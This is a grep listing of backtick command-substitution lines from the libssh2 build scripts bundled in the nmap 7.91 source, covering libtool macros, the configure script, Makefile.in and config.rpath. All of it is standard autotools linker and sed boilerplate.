nmap-7.91+dfsg1/libssh2/m4/libtool.m4:6925:	_LT_TAGVAR(archive_expsym_cmds, $1)='sed "s|^|_|" $export_symbols >$output_objdir/$soname.expsym~$CC -shared $pic_flag $libobjs $deplibs $compiler_flags $wl-h,$soname $wl--retain-symbols-file,$output_objdir/$soname.expsym $wl--image-base,`expr ${RANDOM-$$} % 4096 / 2 \* 262144 + 1342177280` -o $lib'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-6926-	;;
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-6930-	    # SGI C++
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:6931:	    _LT_TAGVAR(archive_cmds, $1)='$CC -shared -all -multigot $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags -soname $soname `test -n "$verstring" && func_echo_all "-set_version $verstring"` -update_registry $output_objdir/so_locations -o $lib'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-6932-
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-6941-	      if test no = "$with_gnu_ld"; then
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:6942:	        _LT_TAGVAR(archive_cmds, $1)='$CC -shared $pic_flag -nostdlib $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags $wl-soname $wl$soname `test -n "$verstring" && func_echo_all "$wl-set_version $wl$verstring"` $wl-update_registry $wl$output_objdir/so_locations -o $lib'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-6943-	      else
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:6944:	        _LT_TAGVAR(archive_cmds, $1)='$CC -shared $pic_flag -nostdlib $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags $wl-soname $wl$soname `test -n "$verstring" && func_echo_all "$wl-set_version $wl$verstring"` -o $lib'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-6945-	      fi
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-6962-	    # to its proper name (with version) after linking.
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:6963:	    _LT_TAGVAR(archive_cmds, $1)='tempext=`echo $shared_ext | $SED -e '\''s/\([[^()0-9A-Za-z{}]]\)/\\\\\1/g'\''`; templib=`echo $lib | $SED -e "s/\$tempext\..*/.so/"`; $CC $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags --soname $soname -o \$templib; mv \$templib $lib'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:6964:	    _LT_TAGVAR(archive_expsym_cmds, $1)='tempext=`echo $shared_ext | $SED -e '\''s/\([[^()0-9A-Za-z{}]]\)/\\\\\1/g'\''`; templib=`echo $lib | $SED -e "s/\$tempext\..*/.so/"`; $CC $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags --soname $soname -o \$templib $wl-retain-symbols-file,$export_symbols; mv \$templib $lib'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-6965-	    # Commands to make compiler produce verbose output that lists
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-6972-	    # dependencies.
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:6973:	    output_verbose_link_cmd='templist=`$CC $CFLAGS -v conftest.$objext -o libconftest$shared_ext 2>&1 | $GREP "ld"`; rm -f libconftest$shared_ext; list= ; for z in $templist; do case $z in conftest.$objext) list="$list $z";; *.$objext);; *) list="$list $z";;esac; done; func_echo_all "$list"'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-6974-
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-6987-	    # earlier do not add the objects themselves.
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:6988:	    case `$CC -V 2>&1` in
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-6989-	      *"Version 7."*)
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7008-            # Portland Group C++ compiler
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:7009:	    case `$CC -V` in
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7010-	    *pgCC\ [[1-5]].* | *pgcpp\ [[1-5]].*)
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7013-               $CC --prelink_objects --instantiation_dir $tpldir $objs $libobjs $compile_deplibs~
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:7014:               compile_command="$compile_command `find $tpldir -name \*.o | sort | $NL2SP`"'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7015-	      _LT_TAGVAR(old_archive_cmds, $1)='tpldir=Template.dir~
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7017-                $CC --prelink_objects --instantiation_dir $tpldir $oldobjs$old_deplibs~
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:7018:                $AR $AR_FLAGS $oldlib$oldobjs$old_deplibs `find $tpldir -name \*.o | sort | $NL2SP`~
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7019-                $RANLIB $oldlib'
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7022-                $CC --prelink_objects --instantiation_dir $tpldir $predep_objects $libobjs $deplibs $convenience $postdep_objects~
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:7023:                $CC -shared $pic_flag $predep_objects $libobjs $deplibs `find $tpldir -name \*.o | sort | $NL2SP` $postdep_objects $compiler_flags $wl-soname $wl$soname -o $lib'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7024-	      _LT_TAGVAR(archive_expsym_cmds, $1)='tpldir=Template.dir~
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7026-                $CC --prelink_objects --instantiation_dir $tpldir $predep_objects $libobjs $deplibs $convenience $postdep_objects~
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:7027:                $CC -shared $pic_flag $predep_objects $libobjs $deplibs `find $tpldir -name \*.o | sort | $NL2SP` $postdep_objects $compiler_flags $wl-soname $wl$soname $wl-retain-symbols-file $wl$export_symbols -o $lib'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7028-	      ;;
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7036-	    _LT_TAGVAR(export_dynamic_flag_spec, $1)='$wl--export-dynamic'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:7037:	    _LT_TAGVAR(whole_archive_flag_spec, $1)='$wl--whole-archive`for conv in $convenience\"\"; do test  -n \"$conv\" && new_convenience=\"$new_convenience,$conv\"; done; func_echo_all \"$new_convenience\"` $wl--no-whole-archive'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7038-            ;;
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7055-	    # dependencies.
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:7056:	    output_verbose_link_cmd='templist=`$CC -shared $CFLAGS -v conftest.$objext 2>&1 | $GREP "ld"`; templist=`func_echo_all "$templist" | $SED "s/\(^.*ld.*\)\( .*ld .*$\)/\1/"`; list= ; for z in $templist; do case $z in conftest.$objext) list="$list $z";; *.$objext);; *) list="$list $z";;esac; done; func_echo_all "X$list" | $Xsed'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7057-	    ;;
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7070-	  *)
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:7071:	    case `$CC -V 2>&1 | sed 5q` in
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7072-	    *Sun\ C*)
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7077-	      _LT_TAGVAR(hardcode_libdir_flag_spec, $1)='-R$libdir'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:7078:	      _LT_TAGVAR(whole_archive_flag_spec, $1)='$wl--whole-archive`new_convenience=; for conv in $convenience\"\"; do test -z \"$conv\" || new_convenience=\"$new_convenience,$conv\"; done; func_echo_all \"$new_convenience\"` $wl--no-whole-archive'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7079-	      _LT_TAGVAR(compiler_needs_object, $1)=yes
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7142-	  _LT_TAGVAR(hardcode_libdir_flag_spec, $1)='$wl-rpath,$libdir'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:7143:	  if test -z "`echo __ELF__ | $CC -E - | grep __ELF__`"; then
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7144-	    _LT_TAGVAR(archive_expsym_cmds, $1)='$CC -shared $pic_flag $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags $wl-retain-symbols-file,$export_symbols -o $lib'
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7161-	    # to its proper name (with version) after linking.
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:7162:	    _LT_TAGVAR(archive_cmds, $1)='tempext=`echo $shared_ext | $SED -e '\''s/\([[^()0-9A-Za-z{}]]\)/\\\\\1/g'\''`; templib=`echo "$lib" | $SED -e "s/\$tempext\..*/.so/"`; $CC $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags --soname $soname -o \$templib; mv \$templib $lib'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7163-
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7182-	        _LT_TAGVAR(allow_undefined_flag, $1)=' $wl-expect_unresolved $wl\*'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:7183:	        _LT_TAGVAR(archive_cmds, $1)='$CC -shared$allow_undefined_flag $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags $wl-soname $soname `test -n "$verstring" && func_echo_all "$wl-set_version $verstring"` -update_registry $output_objdir/so_locations -o $lib'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7184-	        _LT_TAGVAR(hardcode_libdir_flag_spec, $1)='$wl-rpath $wl$libdir'
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7187-	        _LT_TAGVAR(allow_undefined_flag, $1)=' -expect_unresolved \*'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:7188:	        _LT_TAGVAR(archive_cmds, $1)='$CC -shared$allow_undefined_flag $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags -msym -soname $soname `test -n "$verstring" && func_echo_all "-set_version $verstring"` -update_registry $output_objdir/so_locations -o $lib'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:7189:	        _LT_TAGVAR(archive_expsym_cmds, $1)='for i in `cat $export_symbols`; do printf "%s %s\\n" -exported_symbol "\$i" >> $lib.exp; done~
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7190-                  echo "-hidden">> $lib.exp~
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:7191:                  $CC -shared$allow_undefined_flag $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags -msym -soname $soname $wl-input $wl$lib.exp  `test -n "$verstring" && $ECHO "-set_version $verstring"` -update_registry $output_objdir/so_locations -o $lib~
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7192-                  $RM $lib.exp'
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7206-	    # dependencies.
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:7207:	    output_verbose_link_cmd='templist=`$CC -shared $CFLAGS -v conftest.$objext 2>&1 | $GREP "ld" | $GREP -v "ld:"`; templist=`func_echo_all "$templist" | $SED "s/\(^.*ld.*\)\( .*ld.*$\)/\1/"`; list= ; for z in $templist; do case $z in conftest.$objext) list="$list $z";; *.$objext);; *) list="$list $z";;esac; done; func_echo_all "$list"'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7208-	    ;;
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7213-	        osf3*)
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:7214:	          _LT_TAGVAR(archive_cmds, $1)='$CC -shared -nostdlib $allow_undefined_flag $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags $wl-soname $wl$soname `test -n "$verstring" && func_echo_all "$wl-set_version $wl$verstring"` $wl-update_registry $wl$output_objdir/so_locations -o $lib'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7215-		  ;;
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7216-	        *)
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:7217:	          _LT_TAGVAR(archive_cmds, $1)='$CC -shared $pic_flag -nostdlib $allow_undefined_flag $predep_objects $libobjs $deplibs $postdep_objects $compiler_flags $wl-msym $wl-soname $wl$soname `test -n "$verstring" && func_echo_all "$wl-set_version $wl$verstring"` $wl-update_registry $wl$output_objdir/so_locations -o $lib'
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7218-		  ;;
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7466-  case @S|@2 in
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:7467:  .*) func_stripname_result=`$ECHO "@S|@3" | $SED "s%^@S|@1%%; s%\\\\@S|@2\$%%"`;;
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:7468:  *)  func_stripname_result=`$ECHO "@S|@3" | $SED "s%^@S|@1%%; s%@S|@2\$%%"`;;
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7469-  esac
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7555-
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:7556:  for p in `eval "$output_verbose_link_cmd"`; do
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7557-    case $prev$p in
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7659-if test -n "${_LT_TAGVAR(compiler_lib_search_path, $1)}"; then
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:7660: _LT_TAGVAR(compiler_lib_search_dirs, $1)=`echo " ${_LT_TAGVAR(compiler_lib_search_path, $1)}" | $SED -e 's! -L! !g' -e 's!^ !!'`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-7661-fi
##############################################
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-8279-    test 10 -lt "$lt_ac_count" && break
nmap-7.91+dfsg1/libssh2/m4/libtool.m4:8280:    lt_ac_count=`expr $lt_ac_count + 1`
nmap-7.91+dfsg1/libssh2/m4/libtool.m4-8281-    if test "$lt_ac_count" -gt "$lt_ac_max"; then
##############################################
nmap-7.91+dfsg1/libssh2/m4/ltsugar.m4-68-m4_define([lt_combine],
nmap-7.91+dfsg1/libssh2/m4/ltsugar.m4:69:[m4_if(m4_eval([$# > 3]), [1],
nmap-7.91+dfsg1/libssh2/m4/ltsugar.m4-70-       [m4_pushdef([_Lt_sep], [m4_define([_Lt_sep], m4_defn([lt_car]))])]]dnl
##############################################
nmap-7.91+dfsg1/libssh2/m4/lib-prefix.m4-168-  acl_libdirstem=lib
nmap-7.91+dfsg1/libssh2/m4/lib-prefix.m4:169:  searchpath=`(LC_ALL=C $CC -print-search-dirs) 2>/dev/null | sed -n -e 's,^libraries: ,,p' | sed -e 's,^=,,'`
nmap-7.91+dfsg1/libssh2/m4/lib-prefix.m4-170-  if test -n "$searchpath"; then
##############################################
nmap-7.91+dfsg1/libssh2/m4/lib-prefix.m4-175-          */lib64/ | */lib64 ) acl_libdirstem=lib64 ;;
nmap-7.91+dfsg1/libssh2/m4/lib-prefix.m4:176:          *) searchdir=`cd "$searchdir" && pwd`
nmap-7.91+dfsg1/libssh2/m4/lib-prefix.m4-177-             case "$searchdir" in
##############################################
nmap-7.91+dfsg1/libssh2/compile-67-	mingw/*)
nmap-7.91+dfsg1/libssh2/compile:68:	  file=`cmd //C echo "$file " | sed -e 's/"\(.*\) " *$/\1/'`
nmap-7.91+dfsg1/libssh2/compile-69-	  ;;
nmap-7.91+dfsg1/libssh2/compile-70-	cygwin/*)
nmap-7.91+dfsg1/libssh2/compile:71:	  file=`cygpath -m "$file" || echo "$file"`
nmap-7.91+dfsg1/libssh2/compile-72-	  ;;
nmap-7.91+dfsg1/libssh2/compile-73-	wine/*)
nmap-7.91+dfsg1/libssh2/compile:74:	  file=`winepath -w "$file" || echo "$file"`
nmap-7.91+dfsg1/libssh2/compile-75-	  ;;
##############################################
nmap-7.91+dfsg1/libssh2/compile-310-# Name of file we expect compiler to create.
nmap-7.91+dfsg1/libssh2/compile:311:cofile=`echo "$cfile" | sed 's|^.*[\\/]||; s|^[a-zA-Z]:||; s/\.c$/.o/'`
nmap-7.91+dfsg1/libssh2/compile-312-
##############################################
nmap-7.91+dfsg1/libssh2/compile-316-# object file name, since that is what matters with a parallel build.
nmap-7.91+dfsg1/libssh2/compile:317:lockdir=`echo "$cofile" | sed -e 's|[/\\:.-]|_|g'`.d
nmap-7.91+dfsg1/libssh2/compile-318-while true; do
##############################################
nmap-7.91+dfsg1/libssh2/src/Makefile.in-50-  { \
nmap-7.91+dfsg1/libssh2/src/Makefile.in:51:    flg=`printf '%s\n' "$$flg" | sed "s/$$1.*$$//"`; \
nmap-7.91+dfsg1/libssh2/src/Makefile.in-52-  }; \
##############################################
nmap-7.91+dfsg1/libssh2/src/Makefile.in-106-CONFIG_CLEAN_VPATH_FILES =
nmap-7.91+dfsg1/libssh2/src/Makefile.in:107:am__vpath_adj_setup = srcdirstrip=`echo "$(srcdir)" | sed 's|.|.|g'`;
nmap-7.91+dfsg1/libssh2/src/Makefile.in-108-am__vpath_adj = case $$p in \
nmap-7.91+dfsg1/libssh2/src/Makefile.in:109:    $(srcdir)/*) f=`echo "$$p" | sed "s|^$$srcdirstrip/||"`;; \
nmap-7.91+dfsg1/libssh2/src/Makefile.in-110-    *) f=$$p;; \
nmap-7.91+dfsg1/libssh2/src/Makefile.in-111-  esac;
nmap-7.91+dfsg1/libssh2/src/Makefile.in:112:am__strip_dir = f=`echo $$p | sed -e 's|^.*/||'`;
nmap-7.91+dfsg1/libssh2/src/Makefile.in-113-am__install_max = 40
nmap-7.91+dfsg1/libssh2/src/Makefile.in-114-am__nobase_strip_setup = \
nmap-7.91+dfsg1/libssh2/src/Makefile.in:115:  srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*|]/\\\\&/g'`
nmap-7.91+dfsg1/libssh2/src/Makefile.in-116-am__nobase_strip = \
##############################################
nmap-7.91+dfsg1/libssh2/src/Makefile.in-596-.c.obj:
nmap-7.91+dfsg1/libssh2/src/Makefile.in:597:@am__fastdepCC_TRUE@	$(AM_V_CC)$(COMPILE) -MT $@ -MD -MP -MF $(DEPDIR)/$*.Tpo -c -o $@ `$(CYGPATH_W) '$<'`
nmap-7.91+dfsg1/libssh2/src/Makefile.in-598-@am__fastdepCC_TRUE@	$(AM_V_at)$(am__mv) $(DEPDIR)/$*.Tpo $(DEPDIR)/$*.Po
##############################################
nmap-7.91+dfsg1/libssh2/src/Makefile.in-600-@AMDEP_TRUE@@am__fastdepCC_FALSE@	DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
nmap-7.91+dfsg1/libssh2/src/Makefile.in:601:@am__fastdepCC_FALSE@	$(AM_V_CC@am__nodep@)$(COMPILE) -c -o $@ `$(CYGPATH_W) '$<'`
nmap-7.91+dfsg1/libssh2/src/Makefile.in-602-
##############################################
nmap-7.91+dfsg1/libssh2/src/Makefile.in-645-GTAGS:
nmap-7.91+dfsg1/libssh2/src/Makefile.in:646:	here=`$(am__cd) $(top_builddir) && pwd` \
nmap-7.91+dfsg1/libssh2/src/Makefile.in-647-	  && $(am__cd) $(top_srcdir) \
##############################################
nmap-7.91+dfsg1/libssh2/src/Makefile.in-671-distdir-am: $(DISTFILES)
nmap-7.91+dfsg1/libssh2/src/Makefile.in:672:	@srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \
nmap-7.91+dfsg1/libssh2/src/Makefile.in:673:	topsrcdirstrip=`echo "$(top_srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \
nmap-7.91+dfsg1/libssh2/src/Makefile.in-674-	list='$(DISTFILES)'; \
##############################################
nmap-7.91+dfsg1/libssh2/src/Makefile.in-685-	  if test -d $$d/$$file; then \
nmap-7.91+dfsg1/libssh2/src/Makefile.in:686:	    dir=`echo "/$$file" | sed -e 's,/[^/]*$$,,'`; \
nmap-7.91+dfsg1/libssh2/src/Makefile.in-687-	    if test -d "$(distdir)/$$file"; then \
##############################################
nmap-7.91+dfsg1/libssh2/config.rpath-33-host="$1"
nmap-7.91+dfsg1/libssh2/config.rpath:34:host_cpu=`echo "$host" | sed 's/^\([^-]*\)-\([^-]*\)-\(.*\)$/\1/'`
nmap-7.91+dfsg1/libssh2/config.rpath:35:host_vendor=`echo "$host" | sed 's/^\([^-]*\)-\([^-]*\)-\(.*\)$/\2/'`
nmap-7.91+dfsg1/libssh2/config.rpath:36:host_os=`echo "$host" | sed 's/^\([^-]*\)-\([^-]*\)-\(.*\)$/\3/'`
nmap-7.91+dfsg1/libssh2/config.rpath-37-
##############################################
nmap-7.91+dfsg1/libssh2/config.rpath-47-done
nmap-7.91+dfsg1/libssh2/config.rpath:48:cc_basename=`echo "$cc_temp" | sed -e 's%^.*/%%'`
nmap-7.91+dfsg1/libssh2/config.rpath-49-
##############################################
nmap-7.91+dfsg1/libssh2/config.rpath-91-        *)
nmap-7.91+dfsg1/libssh2/config.rpath:92:          case `$CC -V 2>&1 | sed 5q` in
nmap-7.91+dfsg1/libssh2/config.rpath-93-            *Sun\ C*)
##############################################
nmap-7.91+dfsg1/libssh2/config.rpath-214-    sysv5* | sco3.2v5* | sco5v6* | unixware* | OpenUNIX*)
nmap-7.91+dfsg1/libssh2/config.rpath:215:      case `$LD -v 2>&1` in
nmap-7.91+dfsg1/libssh2/config.rpath-216-        *\ [01].* | *\ 2.[0-9].* | *\ 2.1[0-5].*)
##############################################
nmap-7.91+dfsg1/libssh2/config.rpath-220-          if $LD --help 2>&1 | grep ': supported targets:.* elf' > /dev/null; then
nmap-7.91+dfsg1/libssh2/config.rpath:221:            hardcode_libdir_flag_spec='`test -z "$SCOABSPATH" && echo ${wl}-rpath,$libdir`'
nmap-7.91+dfsg1/libssh2/config.rpath-222-          else
##############################################
nmap-7.91+dfsg1/libssh2/config.rpath-277-        case $host_os in aix4.[012]|aix4.[012].*)
nmap-7.91+dfsg1/libssh2/config.rpath:278:          collect2name=`${CC} -print-prog-name=collect2`
nmap-7.91+dfsg1/libssh2/config.rpath-279-          if test -f "$collect2name" && \
##############################################
nmap-7.91+dfsg1/libssh2/config.rpath-415-      hardcode_direct=yes
nmap-7.91+dfsg1/libssh2/config.rpath:416:      if test -z "`echo __ELF__ | $CC -E - | grep __ELF__`" || test "$host_os-$host_cpu" = "openbsd2.8-powerpc"; then
nmap-7.91+dfsg1/libssh2/config.rpath-417-        hardcode_libdir_flag_spec='${wl}-rpath,$libdir'
##############################################
nmap-7.91+dfsg1/libssh2/config.rpath-476-    sysv5* | sco3.2v5* | sco5v6*)
nmap-7.91+dfsg1/libssh2/config.rpath:477:      hardcode_libdir_flag_spec='`test -z "$SCOABSPATH" && echo ${wl}-R,$libdir`'
nmap-7.91+dfsg1/libssh2/config.rpath-478-      hardcode_libdir_separator=':'
##############################################
nmap-7.91+dfsg1/libssh2/config.rpath-621-sed_quote_subst='s/\(["`$\\]\)/\\\1/g'
nmap-7.91+dfsg1/libssh2/config.rpath:622:escaped_wl=`echo "X$wl" | sed -e 's/^X//' -e "$sed_quote_subst"`
nmap-7.91+dfsg1/libssh2/config.rpath:623:shlibext=`echo "$shrext" | sed -e 's,^\.,,'`
nmap-7.91+dfsg1/libssh2/config.rpath:624:escaped_libname_spec=`echo "X$libname_spec" | sed -e 's/^X//' -e "$sed_quote_subst"`
nmap-7.91+dfsg1/libssh2/config.rpath:625:escaped_library_names_spec=`echo "X$library_names_spec" | sed -e 's/^X//' -e "$sed_quote_subst"`
nmap-7.91+dfsg1/libssh2/config.rpath:626:escaped_hardcode_libdir_flag_spec=`echo "X$hardcode_libdir_flag_spec" | sed -e 's/^X//' -e "$sed_quote_subst"`
nmap-7.91+dfsg1/libssh2/config.rpath-627-
##############################################
nmap-7.91+dfsg1/libssh2/configure-45-if test -z "$BASH_VERSION$ZSH_VERSION" \
nmap-7.91+dfsg1/libssh2/configure:46:    && (test "X`print -r -- $as_echo`" = "X$as_echo") 2>/dev/null; then
nmap-7.91+dfsg1/libssh2/configure-47-  as_echo='print -r --'
nmap-7.91+dfsg1/libssh2/configure-48-  as_echo_n='print -rn --'
nmap-7.91+dfsg1/libssh2/configure:49:elif (test "X`printf %s $as_echo`" = "X$as_echo") 2>/dev/null; then
nmap-7.91+dfsg1/libssh2/configure-50-  as_echo='printf %s\n'
##############################################
nmap-7.91+dfsg1/libssh2/configure-52-else
nmap-7.91+dfsg1/libssh2/configure:53:  if test "X`(/usr/ucb/echo -n -n $as_echo) 2>/dev/null`" = "X-n $as_echo"; then
nmap-7.91+dfsg1/libssh2/configure-54-    as_echo_body='eval /usr/ucb/echo -n "$1$as_nl"'
##############################################
nmap-7.91+dfsg1/libssh2/configure-62-	expr "X$arg" : "X\\(.*\\)$as_nl";
nmap-7.91+dfsg1/libssh2/configure:63:	arg=`expr "X$arg" : ".*$as_nl\\(.*\\)"`;;
nmap-7.91+dfsg1/libssh2/configure-64-      esac;
##############################################
nmap-7.91+dfsg1/libssh2/configure-199-  eval 'test \"x\$as_lineno_1'\$as_run'\" != \"x\$as_lineno_2'\$as_run'\" &&
nmap-7.91+dfsg1/libssh2/configure:200:  test \"x\`expr \$as_lineno_1'\$as_run' + 1\`\" = \"x\$as_lineno_2'\$as_run'\"' || exit 1
nmap-7.91+dfsg1/libssh2/configure-201-test \$(( 1 + 1 )) = 2 || exit 1
##############################################
nmap-7.91+dfsg1/libssh2/configure-207-    PATH=/empty FPATH=/empty; export PATH FPATH
nmap-7.91+dfsg1/libssh2/configure:208:    test \"X\`printf %s \$ECHO\`\" = \"X\$ECHO\" \\
nmap-7.91+dfsg1/libssh2/configure:209:      || test \"X\`print -r -- \$ECHO\`\" = \"X\$ECHO\" ) || exit 1"
nmap-7.91+dfsg1/libssh2/configure-210-  if (eval "$as_required") 2>/dev/null; then :
##############################################
nmap-7.91+dfsg1/libssh2/configure-335-      case $as_dir in #(
nmap-7.91+dfsg1/libssh2/configure:336:      *\'*) as_qdir=`$as_echo "$as_dir" | sed "s/'/'\\\\\\\\''/g"`;; #'(
nmap-7.91+dfsg1/libssh2/configure-337-      *) as_qdir=$as_dir;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-408-  {
nmap-7.91+dfsg1/libssh2/configure:409:    as_val=`expr "$@" || test $? -eq 1`
nmap-7.91+dfsg1/libssh2/configure-410-  }
##############################################
nmap-7.91+dfsg1/libssh2/configure-415-# ----------------------------------------
nmap-7.91+dfsg1/libssh2/configure:416:# Output "`basename $0`: error: ERROR" to stderr. If LINENO and LOG_FD are
nmap-7.91+dfsg1/libssh2/configure-417-# provided, also output the error to LOG_FD, referencing LINENO. Then exit the
##############################################
nmap-7.91+dfsg1/libssh2/configure-478-  eval 'test "x$as_lineno_1'$as_run'" != "x$as_lineno_2'$as_run'" &&
nmap-7.91+dfsg1/libssh2/configure:479:  test "x`expr $as_lineno_1'$as_run' + 1`" = "x$as_lineno_2'$as_run'"' || {
nmap-7.91+dfsg1/libssh2/configure-480-  # Blame Lee E. McMahon (1931-1989) for sed's syntax.  :-)
##############################################
nmap-7.91+dfsg1/libssh2/configure-901-  case $ac_option in
nmap-7.91+dfsg1/libssh2/configure:902:  *=?*) ac_optarg=`expr "X$ac_option" : '[^=]*=\(.*\)'` ;;
nmap-7.91+dfsg1/libssh2/configure-903-  *=)   ac_optarg= ;;
##############################################
nmap-7.91+dfsg1/libssh2/configure-945-  -disable-* | --disable-*)
nmap-7.91+dfsg1/libssh2/configure:946:    ac_useropt=`expr "x$ac_option" : 'x-*disable-\(.*\)'`
nmap-7.91+dfsg1/libssh2/configure-947-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/libssh2/configure-950-    ac_useropt_orig=$ac_useropt
nmap-7.91+dfsg1/libssh2/configure:951:    ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'`
nmap-7.91+dfsg1/libssh2/configure-952-    case $ac_user_opts in
##############################################
nmap-7.91+dfsg1/libssh2/configure-971-  -enable-* | --enable-*)
nmap-7.91+dfsg1/libssh2/configure:972:    ac_useropt=`expr "x$ac_option" : 'x-*enable-\([^=]*\)'`
nmap-7.91+dfsg1/libssh2/configure-973-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/libssh2/configure-976-    ac_useropt_orig=$ac_useropt
nmap-7.91+dfsg1/libssh2/configure:977:    ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'`
nmap-7.91+dfsg1/libssh2/configure-978-    case $ac_user_opts in
##############################################
nmap-7.91+dfsg1/libssh2/configure-1184-  -with-* | --with-*)
nmap-7.91+dfsg1/libssh2/configure:1185:    ac_useropt=`expr "x$ac_option" : 'x-*with-\([^=]*\)'`
nmap-7.91+dfsg1/libssh2/configure-1186-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/libssh2/configure-1189-    ac_useropt_orig=$ac_useropt
nmap-7.91+dfsg1/libssh2/configure:1190:    ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'`
nmap-7.91+dfsg1/libssh2/configure-1191-    case $ac_user_opts in
##############################################
nmap-7.91+dfsg1/libssh2/configure-1200-  -without-* | --without-*)
nmap-7.91+dfsg1/libssh2/configure:1201:    ac_useropt=`expr "x$ac_option" : 'x-*without-\(.*\)'`
nmap-7.91+dfsg1/libssh2/configure-1202-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/libssh2/configure-1205-    ac_useropt_orig=$ac_useropt
